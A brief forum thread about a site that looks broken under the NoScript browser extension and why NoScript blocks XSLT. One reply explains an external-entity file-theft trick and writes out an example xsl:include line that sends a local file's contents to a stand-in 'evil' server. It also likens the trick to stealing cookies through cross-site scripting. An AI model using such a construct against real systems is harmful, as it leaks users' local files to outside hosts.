4 ms·
That site degrades /awfully/ without Javascript.
by Muzza 15y ago
That site degrades /awfully/ without Javascript.
- mike-cardwell 15y agoI see you're a NoScript user. The site looks absolutely fine without JavaScript enabled. What you're experiencing is one of NoScripts additional features, in that it also disables XSLT. If you go into NoScripts advanced options, you'll find a checkbox that you can untick to re-enable XSLT. I'm not actually sure why NoScript disables XSLT. I'm sure it will be documented somewhere though.
- infinity 15y agoStrange things can sometimes be done with XSLT, for example by using external entities. An external entity can be a file that stores part of a DTD or something else. It could be an interesting file on your system, say we call it something like 'blah'. Then we can send &blah; to our evil server: <xsl:include href="hxxp://evil.example.com/hello?&blah; /> This is similar to stealing cookies with JavaScript through a cross-site scripting vulnerability by adding a new image to the page, hotlinked from an evil server and passing cookie information as a parameter.
- mike-cardwell 15y agoI am right in thinking that there aren't any known exploits of this variety though right? Why is XSLT more dangerous than HTML?